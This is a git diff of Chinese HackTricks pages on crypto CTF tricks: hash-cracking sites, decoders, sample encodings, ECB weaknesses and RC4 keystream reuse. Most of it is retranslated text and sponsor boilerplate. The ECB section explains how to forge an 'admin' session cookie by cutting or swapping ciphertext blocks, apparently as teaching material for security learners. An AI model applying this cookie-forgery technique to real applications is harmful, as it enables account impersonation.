* 通过向[**HackTricks**](https://github.com/carlospolop/hacktricks)和[**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github仓库提交PR来分享您的黑客技巧。
|
||||
* 检查[**订阅计划**](https://github.com/sponsors/carlospolop)!
|
||||
* **加入** 💬 [**Discord 群组**](https://discord.gg/hRep4RUj7f) 或 [**telegram 群组**](https://t.me/peass) 或 **关注**我们的**Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.**
|
||||
* 通过向[**HackTricks**](https://github.com/carlospolop/hacktricks)和[**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github 仓库提交 PR 来分享黑客技巧。
|
||||
|
||||
</details>
|
||||
{% endhint %}
|
||||
|
|
|
@ -1,130 +1,84 @@
|
|||
# Crypto CTFs 技巧
|
||||
|
||||
{% hint style="success" %}
|
||||
学习并练习 AWS 黑客技巧:<img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks 培训 AWS 红队专家 (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
|
||||
学习并练习 GCP 黑客技巧:<img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks 培训 GCP 红队专家 (GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
|
||||
|
||||
<details>
|
||||
|
||||
<summary><strong>从零开始学习 AWS 黑客技术,成为专家</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE(HackTricks AWS 红队专家)</strong></a><strong>!</strong></summary>
|
||||
<summary>支持 HackTricks</summary>
|
||||
|
||||
支持 HackTricks 的其他方式:
|
||||
|
||||
- 如果您想看到您的**公司在 HackTricks 中做广告**或**下载 PDF 版本的 HackTricks**,请查看[**订阅计划**](https://github.com/sponsors/carlospolop)!
|
||||
- 获取[**官方 PEASS & HackTricks 商品**](https://peass.creator-spring.com)
|
||||
- 探索[**PEASS 家族**](https://opensea.io/collection/the-peass-family),我们的独家[**NFTs**](https://opensea.io/collection/the-peass-family)
|
||||
- **加入** 💬 [**Discord 群组**](https://discord.gg/hRep4RUj7f) 或 [**电报群组**](https://t.me/peass) 或在 **Twitter** 🐦 上关注我们 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**。**
|
||||
- 通过向 [**HackTricks**](https://github.com/carlospolop/hacktricks) 和 [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github 仓库提交 PR 来分享您的黑客技巧。
|
||||
* 检查[**订阅计划**](https://github.com/sponsors/carlospolop)!
|
||||
* **加入** 💬 [**Discord 群组**](https://discord.gg/hRep4RUj7f) 或 [**电报群组**](https://t.me/peass) 或 **关注**我们的 **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.**
|
||||
* 通过向 [**HackTricks**](https://github.com/carlospolop/hacktricks) 和 [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github 仓库提交 PR 来分享黑客技巧。
|
||||
|
||||
</details>
|
||||
{% endhint %}
|
||||
|
||||
## 在线哈希数据库
|
||||
|
||||
- _**谷歌搜索**_
|
||||
- [http://hashtoolkit.com/reverse-hash?hash=4d186321c1a7f0f354b297e8914ab240](http://hashtoolkit.com/reverse-hash?hash=4d186321c1a7f0f354b297e8914ab240)
|
||||
- [https://www.onlinehashcrack.com/](https://www.onlinehashcrack.com)
|
||||
- [https://crackstation.net/](https://crackstation.net)
|
||||
- [https://md5decrypt.net/](https://md5decrypt.net)
|
||||
- [https://www.onlinehashcrack.com](https://www.onlinehashcrack.com)
|
||||
- [https://gpuhash.me/](https://gpuhash.me)
|
||||
- [https://hashes.org/search.php](https://hashes.org/search.php)
|
||||
- [https://www.cmd5.org/](https://www.cmd5.org)
|
||||
- [https://hashkiller.co.uk/Cracker/MD5](https://hashkiller.co.uk/Cracker/MD5)
|
||||
- [https://www.md5online.org/md5-decrypt.html](https://www.md5online.org/md5-decrypt.html)
|
||||
* _**谷歌搜索**_
|
||||
* [http://hashtoolkit.com/reverse-hash?hash=4d186321c1a7f0f354b297e8914ab240](http://hashtoolkit.com/reverse-hash?hash=4d186321c1a7f0f354b297e8914ab240)
|
||||
* [https://www.onlinehashcrack.com/](https://www.onlinehashcrack.com)
|
||||
* [https://crackstation.net/](https://crackstation.net)
|
||||
* [https://md5decrypt.net/](https://md5decrypt.net)
|
||||
* [https://www.onlinehashcrack.com](https://www.onlinehashcrack.com)
|
||||
* [https://gpuhash.me/](https://gpuhash.me)
|
||||
* [https://hashes.org/search.php](https://hashes.org/search.php)
|
||||
* [https://www.cmd5.org/](https://www.cmd5.org)
|
||||
* [https://hashkiller.co.uk/Cracker/MD5](https://hashkiller.co.uk/Cracker/MD5)
|
||||
* [https://www.md5online.org/md5-decrypt.html](https://www.md5online.org/md5-decrypt.html)
|
||||
|
||||
## 魔术自动解密器
|
||||
|
||||
- [**https://github.com/Ciphey/Ciphey**](https://github.com/Ciphey/Ciphey)
|
||||
- [https://gchq.github.io/CyberChef/](https://gchq.github.io/CyberChef/)(魔术模块)
|
||||
- [https://github.com/dhondta/python-codext](https://github.com/dhondta/python-codext)
|
||||
- [https://www.boxentriq.com/code-breaking](https://www.boxentriq.com/code-breaking)
|
||||
* [**https://github.com/Ciphey/Ciphey**](https://github.com/Ciphey/Ciphey)
|
||||
* [https://gchq.github.io/CyberChef/](https://gchq.github.io/CyberChef/) (魔术模块)
|
||||
* [https://github.com/dhondta/python-codext](https://github.com/dhondta/python-codext)
|
||||
* [https://www.boxentriq.com/code-breaking](https://www.boxentriq.com/code-breaking)
|
||||
|
||||
## 编码器
|
||||
|
||||
大多数编码数据可以使用以下两个资源解码:
|
||||
大多数编码数据可以使用以下两个资源进行解码:
|
||||
|
||||
- [https://www.dcode.fr/tools-list](https://www.dcode.fr/tools-list)
|
||||
- [https://gchq.github.io/CyberChef/](https://gchq.github.io/CyberChef/)
|
||||
* [https://www.dcode.fr/tools-list](https://www.dcode.fr/tools-list)
|
||||
* [https://gchq.github.io/CyberChef/](https://gchq.github.io/CyberChef/)
|
||||
|
||||
### 替换自动解密器
|
||||
|
||||
- [https://www.boxentriq.com/code-breaking/cryptogram](https://www.boxentriq.com/code-breaking/cryptogram)
|
||||
- [https://quipqiup.com/](https://quipqiup.com) - 非常好!
|
||||
* [https://www.boxentriq.com/code-breaking/cryptogram](https://www.boxentriq.com/code-breaking/cryptogram)
|
||||
* [https://quipqiup.com/](https://quipqiup.com) - 非常好!
|
||||
|
||||
#### 凯撒密码 - ROTx 自动解密器
|
||||
|
||||
- [https://www.nayuki.io/page/automatic-caesar-cipher-breaker-javascript](https://www.nayuki.io/page/automatic-caesar-cipher-breaker-javascript)
|
||||
* [https://www.nayuki.io/page/automatic-caesar-cipher-breaker-javascript](https://www.nayuki.io/page/automatic-caesar-cipher-breaker-javascript)
|
||||
|
||||
#### 阿特巴什密码
|
||||
|
||||
- [http://rumkin.com/tools/cipher/atbash.php](http://rumkin.com/tools/cipher/atbash.php)
|
||||
* [http://rumkin.com/tools/cipher/atbash.php](http://rumkin.com/tools/cipher/atbash.php)
|
||||
|
||||
### 基础编码自动解密器
|
||||
|
||||
使用以下链接检查所有这些基础:[https://github.com/dhondta/python-codext](https://github.com/dhondta/python-codext)
|
||||
|
||||
- **Ascii85**
|
||||
- `BQ%]q@psCd@rH0l`
|
||||
- **Base26** \[_A-Z_]
|
||||
- `BQEKGAHRJKHQMVZGKUXNT`
|
||||
- **Base32** \[_A-Z2-7=_]
|
||||
- `NBXWYYLDMFZGCY3PNRQQ====`
|
||||
- **Zbase32** \[_ybndrfg8ejkmcpqxot1uwisza345h769_]
|
||||
- `pbzsaamdcf3gna5xptoo====`
|
||||
- **Base32 Geohash** \[_0-9b-hjkmnp-z_]
|
||||
- `e1rqssc3d5t62svgejhh====`
|
||||
- **Base32 Crockford** \[_0-9A-HJKMNP-TV-Z_]
|
||||
- `D1QPRRB3C5S62RVFDHGG====`
|
||||
- **Base32 Extended Hexadecimal** \[_0-9A-V_]
|
||||
- `D1NMOOB3C5P62ORFDHGG====`
|
||||
- **Base45** \[_0-9A-Z $%\*+-./:_]
|
||||
- `59DPVDGPCVKEUPCPVD`
|
||||
- **Base58 (bitcoin)** \[_1-9A-HJ-NP-Za-km-z_]
|
||||
- `2yJiRg5BF9gmsU6AC`
|
||||
- **Base58 (flickr)** \[_1-9a-km-zA-HJ-NP-Z_]
|
||||
- `2YiHqF5bf9FLSt6ac`
|
||||
- **Base58 (ripple)** \[_rpshnaf39wBUDNEGHJKLM4PQ-T7V-Z2b-eCg65jkm8oFqi1tuvAxyz_]
|
||||
- `pyJ5RgnBE9gm17awU`
|
||||
- **Base62** \[_0-9A-Za-z_]
|
||||
- `g2AextRZpBKRBzQ9`
|
||||
- **Base64** \[_A-Za-z0-9+/=_]
|
||||
- `aG9sYWNhcmFjb2xh`
|
||||
- **Base67** \[_A-Za-z0-9-_.!\~\_]
|
||||
- `NI9JKX0cSUdqhr!p`
|
||||
- **Base85 (Ascii85)** \[_!"#$%&'()\*+,-./0-9:;<=>?@A-Z\[\\]^\_\`a-u_]
|
||||
- `BQ%]q@psCd@rH0l`
|
||||
- **Base85 (Adobe)** \[_!"#$%&'()\*+,-./0-9:;<=>?@A-Z\[\\]^\_\`a-u_]
|
||||
- `<~BQ%]q@psCd@rH0l~>`
|
||||
- **Base85 (IPv6 or RFC1924)** \[_0-9A-Za-z!#$%&()\*+-;<=>?@^_\`{|}\~\_]
|
||||
- `Xm4y`V\_|Y(V{dF>\`
|
||||
- **Base85 (xbtoa)** \[_!"#$%&'()\*+,-./0-9:;<=>?@A-Z\[\\]^\_\`a-u_]
|
||||
- `xbtoa Begin\nBQ%]q@psCd@rH0l\nxbtoa End N 12 c E 1a S 4e6 R 6991d`
|
||||
- **Base85 (XML)** \[_0-9A-Za-y!#$()\*+,-./:;=?@^\`{|}\~z\__]
|
||||
- `Xm4y|V{~Y+V}dF?`
|
||||
- **Base91** \[_A-Za-z0-9!#$%&()\*+,./:;<=>?@\[]^\_\`{|}\~"_]
|
||||
- `frDg[*jNN!7&BQM`
|
||||
- **Base100** \[]
|
||||
- `👟👦👣👘👚👘👩👘👚👦👣👘`
|
||||
- **Base122** \[]
|
||||
- `4F ˂r0Xmvc`
|
||||
- **ATOM-128** \[_/128GhIoPQROSTeUbADfgHijKLM+n0pFWXY456xyzB7=39VaqrstJklmNuZvwcdEC_]
|
||||
- `MIc3KiXa+Ihz+lrXMIc3KbCC`
|
||||
- **HAZZ15** \[_HNO4klm6ij9n+J2hyf0gzA8uvwDEq3X1Q7ZKeFrWcVTts/MRGYbdxSo=ILaUpPBC5_]
|
||||
- `DmPsv8J7qrlKEoY7`
|
||||
- **MEGAN35** \[_3G-Ub=c-pW-Z/12+406-9Vaq-zA-F5_]
|
||||
- `kLD8iwKsigSalLJ5`
|
||||
- **ZONG22** \[_ZKj9n+yf0wDVX1s/5YbdxSo=ILaUpPBCHg8uvNO4klm6iJGhQ7eFrWczAMEq3RTt2_]
|
||||
- `ayRiIo1gpO+uUc7g`
|
||||
- **ESAB46** \[]
|
||||
- `3sHcL2NR8WrT7mhR`
|
||||
- **MEGAN45** \[]
|
||||
- `kLD8igSXm2KZlwrX`
|
||||
- **TIGO3FX** \[]
|
||||
- `7AP9mIzdmltYmIP9mWXX`
|
||||
- **TRIPO5** \[]
|
||||
- `UE9vSbnBW6psVzxB`
|
||||
- **FERON74** \[]
|
||||
- `PbGkNudxCzaKBm0x`
|
||||
- **GILA7** \[]
|
||||
- `D+nkv8C1qIKMErY1`
|
||||
- **Citrix CTX1** \[]
|
||||
- `MNGIKCAHMOGLKPAKMMGJKNAINPHKLOBLNNHILCBHNOHLLPBK`
|
||||
使用以下链接检查所有这些基础编码:[https://github.com/dhondta/python-codext](https://github.com/dhondta/python-codext)
|
||||
* **HAZZ15** \[_HNO4klm6ij9n+J2hyf0gzA8uvwDEq3X1Q7ZKeFrWcVTts/MRGYbdxSo=ILaUpPBC5_]
|
||||
* `DmPsv8J7qrlKEoY7`
|
||||
* **MEGAN35** \[_3G-Ub=c-pW-Z/12+406-9Vaq-zA-F5_]
|
||||
* `kLD8iwKsigSalLJ5`
|
||||
* **ZONG22** \[_ZKj9n+yf0wDVX1s/5YbdxSo=ILaUpPBCHg8uvNO4klm6iJGhQ7eFrWczAMEq3RTt2_]
|
||||
* `ayRiIo1gpO+uUc7g`
|
||||
* **ESAB46** \[]
|
||||
* `3sHcL2NR8WrT7mhR`
|
||||
* **MEGAN45** \[]
|
||||
* `kLD8igSXm2KZlwrX`
|
||||
* **TIGO3FX** \[]
|
||||
* `7AP9mIzdmltYmIP9mWXX`
|
||||
* **TRIPO5** \[]
|
||||
* `UE9vSbnBW6psVzxB`
|
||||
* **FERON74** \[]
|
||||
* `PbGkNudxCzaKBm0x`
|
||||
* **GILA7** \[]
|
||||
* `D+nkv8C1qIKMErY1`
|
||||
* **Citrix CTX1** \[]
|
||||
* `MNGIKCAHMOGLKPAKMMGJKNAINPHKLOBLNNHILCBHNOHLLPBK`
|
||||
|
||||
[http://k4.cba.pl/dw/crypo/tools/eng\_atom128c.html](http://k4.cba.pl/dw/crypo/tools/eng\_atom128c.html) - 404 Dead: [https://web.archive.org/web/20190228181208/http://k4.cba.pl/dw/crypo/tools/eng\_hackerize.html](https://web.archive.org/web/20190228181208/http://k4.cba.pl/dw/crypo/tools/eng\_hackerize.html)
|
||||
|
||||
|
@ -136,17 +90,13 @@
|
|||
|
||||
### Morse
|
||||
|
||||
* [http://k4.cba.pl/dw/crypo/tools/eng\_hackerize.html](http://k4.cba.pl/dw/crypo/tools/eng\_hackerize.html) - 404 Dead: [https://web.archive.org/web/20190228181208/http://k4.cba.pl/dw/crypo/tools/eng\_hackerize.html](https://web.archive.org/web/20190228181208/http://k4.cba.pl/dw/crypo/tools/eng\_hackerize.html)
|
||||
|
||||
### 摩尔斯
|
||||
### Morse
|
||||
```
|
||||
.... --- .-.. -.-. .- .-. .- -.-. --- .-.. .-
|
||||
```
|
||||
* [http://k4.cba.pl/dw/crypo/tools/eng\_morse-encode.html](http://k4.cba.pl/dw/crypo/tools/eng\_morse-encode.html) - 404 Dead: [https://gchq.github.io/CyberChef/](https://gchq.github.io/CyberChef/)
|
||||
* [http://k4.cba.pl/dw/crypo/tools/eng\_morse-encode.html](http://k4.cba.pl/dw/crypo/tools/eng\_morse-encode.html) - 404 页面不存在: [https://gchq.github.io/CyberChef/](https://gchq.github.io/CyberChef/)
|
||||
|
||||
### UUencoder
|
||||
|
||||
* [http://k4.cba.pl/dw/crypo/tools/eng\_morse-encode.html](http://k4.cba.pl/dw/crypo/tools/eng\_morse-encode.html) - 404 死链: [https://gchq.github.io/CyberChef/](https://gchq.github.io/CyberChef/)
|
||||
### UU编码器
|
||||
```
|
||||
begin 644 webutils_pl
|
||||
M2$],04A/3$%(3TQ!2$],04A/3$%(3TQ!2$],04A/3$%(3TQ!2$],04A/3$%(
|
||||
|
@ -157,7 +107,7 @@ end
|
|||
```
|
||||
* [http://www.webutils.pl/index.php?idx=uu](http://www.webutils.pl/index.php?idx=uu)
|
||||
|
||||
### XXEncoder
|
||||
### XX编码器
|
||||
```
|
||||
begin 644 webutils_pl
|
||||
hG2xAEIVDH236Hol-G2xAEIVDH236Hol-G2xAEIVDH236Hol-G2xAEIVDH236
|
||||
|
@ -186,10 +136,6 @@ ryvkryvkryvkryvkryvkryvkryvk
|
|||
```
|
||||
* [http://www.webutils.pl/index.php?idx=binhex](http://www.webutils.pl/index.php?idx=binhex)
|
||||
|
||||
### ASCII85
|
||||
|
||||
* [http://www.webutils.pl/index.php?idx=binhex](http://www.webutils.pl/index.php?idx=binhex)
|
||||
|
||||
### ASCII85
|
||||
```
|
||||
<~85DoF85DoF85DoF85DoF85DoF85DoF~>
|
||||
|
@ -235,7 +181,7 @@ AABBB ABBAB ABABA AAAAA AAABA AAAAA BAAAA AAAAA AAABA ABBAB ABABA AAAAA
|
|||
|
||||
## 压缩
|
||||
|
||||
**原始压缩** 和 **原始解压**(您可以在 Cyberchef 中找到)可以在没有标头的情况下压缩和解压数据。
|
||||
**原始压缩** 和 **原始解压**(你可以在 Cyberchef 中找到)可以压缩和解压数据而不包含头部信息。
|
||||
|
||||
## 简单加密
|
||||
|
||||
|
@ -263,7 +209,7 @@ wodsyoidrods
|
|||
|
||||
### Fernet
|
||||
|
||||
2个base64字符串(令牌和密钥)
|
||||
2个base64字符串(token和key)
|
||||
```
|
||||
Token:
|
||||
gAAAAABWC9P7-9RsxTz_dwxh9-O2VUB7Ih8UCQL1_Zk4suxnkCvb26Ie4i8HSUJ4caHZuiNtjLl3qfmCv_fS3_VpjL7HxCz7_Q==
|
||||
|
@ -294,16 +240,17 @@ Key:
|
|||
* [https://github.com/lockedbyte/cryptovenom](https://github.com/lockedbyte/cryptovenom)
|
||||
* [https://github.com/nccgroup/featherduster](https://github.com/nccgroup/featherduster)
|
||||
|
||||
{% hint style="success" %}
|
||||
学习并练习AWS黑客技术:<img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks培训AWS红队专家(ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
|
||||
学习并练习GCP黑客技术:<img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks培训GCP红队专家(GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
|
||||
|
||||
<details>
|
||||
|
||||
<summary><strong>从零开始学习AWS黑客技术,成为专家</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
|
||||
<summary>支持HackTricks</summary>
|
||||
|
||||
支持HackTricks的其他方式:
|
||||
|
||||
* 如果您想在HackTricks中看到您的**公司广告**或**下载PDF格式的HackTricks**,请查看[**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
|
||||
* 获取[**官方PEASS & HackTricks周边产品**](https://peass.creator-spring.com)
|
||||
* 探索[**PEASS Family**](https://opensea.io/collection/the-peass-family),我们的独家[NFTs](https://opensea.io/collection/the-peass-family)收藏品
|
||||
* **加入** 💬 [**Discord群**](https://discord.gg/hRep4RUj7f) 或 [**电报群**](https://t.me/peass) 或在**Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**上关注**我们。
|
||||
* 通过向[**HackTricks**](https://github.com/carlospolop/hacktricks)和[**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github仓库提交PR来分享您的黑客技巧。
|
||||
* 查看[**订阅计划**](https://github.com/sponsors/carlospolop)!
|
||||
* **加入** 💬 [**Discord群组**](https://discord.gg/hRep4RUj7f) 或 [**电报群组**](https://t.me/peass) 或 **关注**我们的**Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.**
|
||||
* 通过向[**HackTricks**](https://github.com/carlospolop/hacktricks)和[**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github仓库提交PR来分享黑客技巧。
|
||||
|
||||
</details>
|
||||
{% endhint %}
|
||||
|
|
|
@ -1,21 +1,22 @@
|
|||
{% hint style="success" %}
|
||||
学习并练习AWS黑客技术:<img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks培训AWS红队专家(ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
|
||||
学习并练习GCP黑客技术:<img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks培训GCP红队专家(GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
|
||||
|
||||
<details>
|
||||
|
||||
<summary><strong>从零开始学习AWS黑客技术,成为专家</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE(HackTricks AWS红队专家)</strong></a><strong>!</strong></summary>
|
||||
<summary>支持HackTricks</summary>
|
||||
|
||||
支持HackTricks的其他方式:
|
||||
|
||||
* 如果您想在HackTricks中看到您的**公司广告**或**下载PDF格式的HackTricks**,请查看[**订阅计划**](https://github.com/sponsors/carlospolop)!
|
||||
* 获取[**官方PEASS & HackTricks周边产品**](https://peass.creator-spring.com)
|
||||
* 探索[**PEASS家族**](https://opensea.io/collection/the-peass-family),我们的独家[**NFTs**](https://opensea.io/collection/the-peass-family)
|
||||
* **加入** 💬 [**Discord群组**](https://discord.gg/hRep4RUj7f) 或 [**电报群组**](https://t.me/peass) 或在**Twitter**上关注我们 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**。**
|
||||
* 通过向[**HackTricks**](https://github.com/carlospolop/hacktricks)和[**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github仓库提交PR来分享您的黑客技巧。
|
||||
* 检查[**订阅计划**](https://github.com/sponsors/carlospolop)!
|
||||
* **加入** 💬 [**Discord群组**](https://discord.gg/hRep4RUj7f) 或 [**电报群组**](https://t.me/peass) 或 **关注**我们的**Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.**
|
||||
* 通过向[**HackTricks**](https://github.com/carlospolop/hacktricks)和[**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github仓库提交PR来分享黑客技巧。
|
||||
|
||||
</details>
|
||||
{% endhint %}
|
||||
|
||||
|
||||
# ECB
|
||||
|
||||
(ECB) 电子密码本 - 对称加密方案,**将明文的每个块**替换为**密文块**。这是**最简单**的加密方案。其主要思想是将明文分割成**N位的块**(取决于输入数据块的大小、加密算法),然后使用唯一密钥加密(解密)每个明文块。
|
||||
(ECB) 电子密码本 - 对称加密方案,**将明文的每个块**替换为**密文块**。这是**最简单**的加密方案。其主要思想是将明文分成**N位的块**(取决于输入数据块的大小、加密算法),然后使用唯一密钥加密(解密)每个明文块。
|
||||
|
||||
![](https://upload.wikimedia.org/wikipedia/commons/thumb/e/e6/ECB_decryption.svg/601px-ECB_decryption.svg.png)
|
||||
|
||||
|
@ -27,26 +28,26 @@
|
|||
# 漏洞的检测
|
||||
|
||||
想象一下,您多次登录一个应用程序,**总是得到相同的cookie**。这是因为应用程序的cookie是**`<用户名>|<密码>`**。\
|
||||
然后,您创建两个新用户,两者都具有**相同的长密码**和**几乎相同的用户名**。\
|
||||
您发现**两个用户信息的8字节块**是**相同的**。然后,您想象这可能是因为正在使用**ECB**。
|
||||
然后,您生成两个新用户,两者都有**相同的长密码**和**几乎相同的用户名**。\
|
||||
您发现**两个用户信息**相同的**8字节块**是**相同的**。然后,您想象这可能是因为正在使用**ECB**。
|
||||
|
||||
就像以下示例中一样。观察这**两个解码的cookie**中多次出现的块**`\x23U\xE45K\xCB\x21\xC8`**。
|
||||
就像在以下示例中一样。观察这**两个解码的cookie**中多次出现的块**`\x23U\xE45K\xCB\x21\xC8`**。
|
||||
```
|
||||
\x23U\xE45K\xCB\x21\xC8\x23U\xE45K\xCB\x21\xC8\x04\xB6\xE1H\xD1\x1E \xB6\x23U\xE45K\xCB\x21\xC8\x23U\xE45K\xCB\x21\xC8+=\xD4F\xF7\x99\xD9\xA9
|
||||
|
||||
\x23U\xE45K\xCB\x21\xC8\x23U\xE45K\xCB\x21\xC8\x04\xB6\xE1H\xD1\x1E \xB6\x23U\xE45K\xCB\x21\xC8\x23U\xE45K\xCB\x21\xC8+=\xD4F\xF7\x99\xD9\xA9
|
||||
```
|
||||
这是因为这些 cookie 的**用户名和密码中包含多次字母"a"**(例如)。**不同的区块**是包含**至少 1 个不同字符**的区块(也许是分隔符"|"或用户名中的某些必要差异)。
|
||||
这是因为这些 cookie 的**用户名和密码中包含多次字母"a"**(例如)。**不同的区块**是指包含**至少 1 个不同字符**的区块(也许是分隔符"|"或用户名中的某些必要差异)。
|
||||
|
||||
现在,攻击者只需发现格式是`<用户名><分隔符><密码>`还是`<密码><分隔符><用户名>`。为了做到这一点,他只需**生成几个相似且较长的用户名和密码**,直到找到格式和分隔符的长度:
|
||||
现在,攻击者只需发现格式是`<用户名><分隔符><密码>`还是`<密码><分隔符><用户名>`。为了做到这一点,他可以**生成多个相似且较长的用户名和密码**,直到找到格式和分隔符的长度:
|
||||
|
||||
| 用户名长度: | 密码长度: | 用户名+密码长度: | 解码后的 Cookie 长度: |
|
||||
| ------------ | ---------- | ---------------- | ----------------------- |
|
||||
| 2 | 2 | 4 | 8 |
|
||||
| 3 | 3 | 6 | 8 |
|
||||
| 3 | 4 | 7 | 8 |
|
||||
| 4 | 4 | 8 | 16 |
|
||||
| 7 | 7 | 14 | 16 |
|
||||
| ------------ | ---------- | ---------------- | ------------------------ |
|
||||
| 2 | 2 | 4 | 8 |
|
||||
| 3 | 3 | 6 | 8 |
|
||||
| 3 | 4 | 7 | 8 |
|
||||
| 4 | 4 | 8 | 16 |
|
||||
| 7 | 7 | 14 | 16 |
|
||||
|
||||
# 漏洞的利用
|
||||
|
||||
|
@ -57,7 +58,7 @@
|
|||
\x23U\xE45K\xCB\x21\xC8\xE0Vd8oE\x123\aO\x43T\x32\xD5U\xD4
|
||||
```
|
||||
我们可以看到先前使用只包含`a`的用户名创建的模式`\x23U\xE45K\xCB\x21\xC8`。\
|
||||
然后,您可以移除前8B块,就可以得到用户名为`admin`的有效cookie:
|
||||
然后,您可以移除第一个8B块,您将得到一个有效的用于用户名`admin`的cookie:
|
||||
```
|
||||
\xE0Vd8oE\x123\aO\x43T\x32\xD5U\xD4
|
||||
```
|
||||
|
@ -67,13 +68,13 @@
|
|||
|
||||
因此,另一种冒充用户`admin`的方法是:
|
||||
|
||||
- 生成一个用户名:`len(<username>) + len(<delimiter) % len(block)`。使用`8B`的块大小,您可以生成名为`username `的用户名,使用分隔符`|`,块`<username><delimiter>`将生成2个8B块。
|
||||
- 然后,生成一个密码,填充包含我们想要冒充的用户名和空格的确切块数,例如:`admin `。
|
||||
- 生成一个用户名:`len(<username>) + len(<delimiter) % len(block)`。使用块大小为`8B`,可以生成名为`username `的用户名,使用分隔符`|`,块`<username><delimiter>`将生成2个8B块。
|
||||
- 然后,生成一个密码,填充包含我们想要冒充的用户名和空格的确切块数,如:`admin `。
|
||||
|
||||
该用户的cookie将由3个块组成:前两个是用户名+分隔符的块,第三个是密码的块(伪装成用户名):`username |admin `。
|
||||
|
||||
**然后,只需用最后一个块替换第一个块,就可以冒充用户`admin`:`admin |username`**
|
||||
|
||||
# 参考
|
||||
## 参考
|
||||
|
||||
* [http://cryptowiki.net/index.php?title=Electronic_Code_Book\_(ECB)](http://cryptowiki.net/index.php?title=Electronic_Code_Book_\(ECB\))
|
||||
- [http://cryptowiki.net/index.php?title=Electronic_Code_Book\_(ECB)](http://cryptowiki.net/index.php?title=Electronic_Code_Book_\(ECB\))
|
||||
|
|
|
@ -1,22 +1,42 @@
|
|||
{% hint style="success" %}
|
||||
学习并练习AWS黑客:<img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks 培训 AWS 红队专家 (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
|
||||
学习并练习GCP黑客:<img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks 培训 GCP 红队专家 (GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
|
||||
|
||||
<details>
|
||||
|
||||
<summary><strong>从零开始学习AWS黑客技术,成为专家</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE(HackTricks AWS红队专家)</strong></a><strong>!</strong></summary>
|
||||
<summary>支持 HackTricks</summary>
|
||||
|
||||
支持HackTricks的其他方式:
|
||||
|
||||
* 如果您想在HackTricks中看到您的**公司广告**或**下载PDF格式的HackTricks**,请查看[**订阅计划**](https://github.com/sponsors/carlospolop)!
|
||||
* 获取[**官方PEASS & HackTricks周边产品**](https://peass.creator-spring.com)
|
||||
* 探索[**PEASS家族**](https://opensea.io/collection/the-peass-family),我们的独家[**NFTs**](https://opensea.io/collection/the-peass-family)
|
||||
* **加入** 💬 [**Discord群**](https://discord.gg/hRep4RUj7f) 或 [**电报群**](https://t.me/peass) 或在**Twitter**上关注我们 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.**
|
||||
* 通过向[**HackTricks**](https://github.com/carlospolop/hacktricks)和[**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github仓库提交PR来分享您的黑客技巧。
|
||||
* 检查 [**订阅计划**](https://github.com/sponsors/carlospolop)!
|
||||
* **加入** 💬 [**Discord 群组**](https://discord.gg/hRep4RUj7f) 或 [**telegram 群组**](https://t.me/peass) 或 **关注** 我们的 **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.**
|
||||
* 通过向 [**HackTricks**](https://github.com/carlospolop/hacktricks) 和 [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github 仓库提交 PR 来分享黑客技巧。
|
||||
|
||||
</details>
|
||||
{% endhint %}
|
||||
|
||||
|
||||
如果您可以使用RC4加密明文,只需使用加密函数即可解密由该RC4加密的任何内容(使用相同的密码)。
|
||||
如果你能以某种方式使用RC4加密明文,那么只需使用加密函数就可以解密由该RC4加密的任何内容(使用相同的密码)。
|
||||
|
||||
如果您可以加密已知明文,还可以提取密码。更多参考资料可以在HTB Kryptos机器中找到:
|
||||
如果你能加密一个已知的明文,你也可以提取密码。更多参考资料可以在HTB Kryptos机器中找到:
|
||||
|
||||
{% embed url="https://0xrick.github.io/hack-the-box/kryptos/" %}
|
||||
|
||||
{% embed url="https://0xrick.github.io/hack-the-box/kryptos/" %}
|
||||
|
||||
